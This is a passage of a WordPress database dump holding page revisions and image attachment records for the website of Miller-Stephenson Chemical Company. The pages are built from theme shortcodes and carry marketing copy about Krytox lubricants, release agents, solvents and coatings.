10:51:23', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (229, 1, '2016-08-16 10:51:41', '2016-08-16 10:51:41', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="218" image_size="medium" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-16 10:51:41', '2016-08-16 10:51:41', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (231, 1, '2016-08-16 15:06:57', '2016-08-16 15:06:57', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-16 15:06:57', '2016-08-16 15:06:57', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (232, 1, '2016-08-16 15:08:40', '2016-08-16 15:08:40', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-16 15:08:40', '2016-08-16 15:08:40', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (233, 1, '2016-08-16 15:24:55', '2016-08-16 15:24:55', '', 'Medical-Home Page', '', 'inherit', 'open', 'closed', '', 'medical-home-page', '', '', '2016-08-16 15:24:55', '2016-08-16 15:24:55', '', 64, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Medical-Home-Page.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (234, 1, '2016-08-16 15:25:14', '2016-08-16 15:25:14', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-16 15:25:14', '2016-08-16 15:25:14', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (236, 1, '2016-08-16 19:00:07', '2016-08-16 19:00:07', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>& SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY & CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-16 19:00:07', '2016-08-16 19:00:07', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (237, 2, '2016-08-16 19:17:17', '2016-08-16 19:17:17', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'canstockphoto8309880', '', '', '2016-08-23 16:52:18', '2016-08-23 16:52:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto8309880.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (238, 2, '2016-08-16 19:20:47', '2016-08-16 19:20:47', '', 'Krytox-GPL-Grease-PFPE-PTFE', '', 'inherit', 'open', 'closed', '', 'canstockphoto0406435', '', '', '2016-08-23 16:43:32', '2016-08-23 16:43:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto0406435.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (239, 2, '2016-08-16 19:20:53', '2016-08-16 19:20:53', '', 'krytox-gpl-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto0762793', '', '', '2016-08-23 16:44:29', '2016-08-23 16:44:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto0762793.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (240, 2, '2016-08-16 19:20:57', '2016-08-16 19:20:57', '', 'krytox_grease_oil_pfpe_ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto1519976', '', '', '2016-08-23 16:56:14', '2016-08-23 16:56:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto1519976.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (241, 2, '2016-08-16 19:21:02', '2016-08-16 19:21:02', '', 'krytox-pfpe-ptfe-grease-oil-aerospace', '', 'inherit', 'open', 'closed', '', 'canstockphoto3559302', '', '', '2016-08-23 16:53:12', '2016-08-23 16:53:12', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto3559302.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (242, 2, '2016-08-16 19:21:06', '2016-08-16 19:21:06', '', 'canstockphoto4506528', '', 'inherit', 'open', 'closed', '', 'canstockphoto4506528', '', '', '2016-08-16 19:21:06', '2016-08-16 19:21:06', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto4506528.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (243, 2, '2016-08-16 19:21:12', '2016-08-16 19:21:12', '', 'krytox-pfpe-ptfe-grease-oil-aerospace', '', 'inherit', 'open', 'closed', '', 'canstockphoto4583899', '', '', '2016-08-23 16:51:42', '2016-08-23 16:51:42', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto4583899.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (244, 2, '2016-08-16 19:21:15', '2016-08-16 19:21:15', '', 'krytox-gpl-oil-pfpe', '', 'inherit', 'open', 'closed', '', 'canstockphoto5265069', '', '', '2016-08-23 16:49:18', '2016-08-23 16:49:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto5265069.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (245, 2, '2016-08-16 19:21:20', '2016-08-16 19:21:20', '', 'canstockphoto5432177', '', 'inherit', 'open', 'closed', '', 'canstockphoto5432177', '', '', '2016-08-16 19:21:20', '2016-08-16 19:21:20', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto5432177.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (246, 2, '2016-08-16 19:21:24', '2016-08-16 19:21:24', '', 'krytox-bearing-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto6002608', '', '', '2016-08-23 16:54:01', '2016-08-23 16:54:01', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto6002608.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (247, 2, '2016-08-16 19:21:28', '2016-08-16 19:21:28', '', 'krytox-pfpe-ptfe-aerospace-grease-oil', '', 'inherit', 'open', 'closed', '', 'canstockphoto7048502', '', '', '2016-08-23 16:50:55', '2016-08-23 16:50:55', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto7048502.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (249, 2, '2016-08-16 19:21:36', '2016-08-16 19:21:36', '', 'canstockphoto9126509', '', 'inherit', 'open', 'closed', '', 'canstockphoto9126509', '', '', '2016-08-16 19:21:36', '2016-08-16 19:21:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto9126509.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (250, 2, '2016-08-16 19:21:39', '2016-08-16 19:21:39', '', 'krytox-aerospace-grease-oil-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto13010266', '', '', '2016-08-23 16:50:07', '2016-08-23 16:50:07', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto13010266.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (251, 2, '2016-08-16 19:21:44', '2016-08-16 19:21:44', '', 'krytox_grease_oil_pfpe_ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto17094490', '', '', '2016-08-23 16:56:04', '2016-08-23 16:56:04', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto17094490.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (252, 2, '2016-08-16 19:21:48', '2016-08-16 19:21:48', '', 'canstockphoto18648112', '', 'inherit', 'open', 'closed', '', 'canstockphoto18648112', '', '', '2016-08-16 19:21:48', '2016-08-16 19:21:48', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto18648112.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (253, 2, '2016-08-16 19:21:53', '2016-08-16 19:21:53', '', 'canstockphoto18902100', '', 'inherit', 'open', 'closed', '', 'canstockphoto18902100', '', '', '2016-08-16 19:21:53', '2016-08-16 19:21:53', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto18902100.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (254, 2, '2016-08-16 19:21:59', '2016-08-16 19:21:59', '', 'krytox-gpl-grease-pfpe-ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto19101885', '', '', '2016-08-23 16:47:17', '2016-08-23 16:47:17', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto19101885.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (255, 2, '2016-08-16 19:22:03', '2016-08-16 19:22:03', '', 'krytox_grease_oil_pfpe_ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto20506280', '', '', '2016-08-23 16:56:24', '2016-08-23 16:56:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto20506280.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (256, 2, '2016-08-16 19:22:08', '2016-08-16 19:22:08', '', 'krytox_grease_oil_pfpe_ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto23808251', '', '', '2016-08-23 16:55:58', '2016-08-23 16:55:58', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto23808251.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (257, 2, '2016-08-16 19:22:12', '2016-08-16 19:22:12', '', 'krytox_grease_oil_pfpe_ptfe', '', 'inherit', 'open', 'closed', '', 'canstockphoto23884332', '', '', '2016-08-23 16:55:56', '2016-08-23 16:55:56', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto23884332.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (258, 2, '2016-08-16 19:22:16', '2016-08-16 19:22:16', '', 'canstockphoto24986129', '', 'inherit', 'open', 'closed', '', 'canstockphoto24986129', '', '', '2016-08-16 19:22:16', '2016-08-16 19:22:16', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto24986129.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (259, 2, '2016-08-16 19:22:19', '2016-08-16 19:22:19', '', 'krytox-pfpe-ptfe-grease-oil-aerospace', '', 'inherit', 'open', 'closed', '', 'canstockphoto25435935', '', '', '2016-08-23 16:53:15', '2016-08-23 16:53:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto25435935.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (260, 2, '2016-08-16 19:22:23', '2016-08-16 19:22:23', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'canstockphoto25461977', '', '', '2016-08-23 16:52:15', '2016-08-23 16:52:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto25461977.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (264, 3, '2016-08-16 19:48:51', '2016-08-16 19:48:51', '', 'Bearings  (1)', '', 'inherit', 'open', 'closed', '', 'bearings-1-3', '', '', '2016-08-16 19:48:51', '2016-08-16 19:48:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Bearings-1-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (265, 3, '2016-08-16 19:58:06', '2016-08-16 19:58:06', '[product_categories number="10" parent="0" columns="6" title="Our categories"]\r\n\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 19:58:06', '2016-08-16 19:58:06', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
